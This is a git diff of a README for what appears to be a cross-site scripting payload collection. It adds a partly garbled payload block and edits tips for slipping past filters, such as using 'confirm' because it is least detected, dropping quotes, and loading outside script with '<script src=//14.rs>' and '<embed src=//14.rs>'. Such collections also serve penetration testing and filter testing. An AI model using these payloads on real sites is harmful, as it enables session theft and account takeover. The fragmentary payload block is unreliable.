diff --git a/README.md b/README.md index cb72836..687105a 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,15 @@ Put this repo on watch. I will be updating it regularly. ``` ### Awesome Payloads -Come back later +``` +(((confirm)))`` + +x +
+z +``` ### Awesome Exploits Come back later @@ -114,14 +122,13 @@ If the your dummy tags lands in the source code as it is, go for any of these pa Come back later ### Awesome Tips & Tricks -- http:// can be shortened to // +- http(s):// can be shortened to // or /\. - **document.cookie** can be shortened to **cookie**. It applies to other DOM objects as well. - alert and other pop-up functions don't need a value, so stop doing **alert(1)** and start doing **alert()** - I have found that **confirm** is the least detected pop-up function so stop using **alert**. - Quotes around attribute value aren't neccessary. You can use **<script src=//14.rs>** instead of **<script src="//14.rs"&glt;** - The shortest independent payload is **<embed src=//14.rs>** (19 chars) -## Credits and all that -Help me buy a new laptop: +### Awesome Credits All the payloads are crafted by me unless specified. Thanks to my big brother [Rodolfo Assis](https://twitter.com/brutelogic) whose writings inspired me to become an XSSLord.